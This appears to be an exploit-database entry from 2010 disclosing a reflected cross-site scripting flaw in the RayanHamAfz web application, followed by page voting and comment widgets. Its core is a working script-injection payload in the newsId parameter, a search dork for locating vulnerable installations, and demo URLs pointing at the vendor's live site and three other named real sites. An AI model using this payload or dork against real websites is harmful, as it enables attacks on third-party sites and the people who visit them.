RayanHamAfz Cross Site Scripting Vulnerability

2010.10.13

Credit: Ajax Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#################################################################
[+] Exploit Title: RayanHamAfz Cross Site Scripting Vulnerability
[+] Author: Cair3x
###########################[ Exploit ]###########################
Dork : [ Copyright &#169; 2008 RayanHamAfza.com ]
Exploit : news.do?method=viewNews&newsId="><script>alert('Xss')</script>
Demo : http://www.rayanhamafza.com/news.do?method=viewNews&newsId="><script>alert('Xss')</script>
Demo :
www.mehrbroker.com
www.bmimf.com
www.iranianfund.com
###########################[ Exploit ]###########################
#################################################################
BY : Cair3x [Cair3x.Support@Gmail.com]
Web Site : Ajaxtm.com
Forum : http://Ajaxtm.com/forum/
[+] Greetz to All Frinds
#################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

RayanHamAfz Cross Site Scripting Vulnerability

Dork: [ Copyright &#169; 2008 RayanHamAfza.com ]

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Dork: [ Copyright © 2008 RayanHamAfza.com ]

Thanks for you comment!
Your message is in quarantine 48 hours.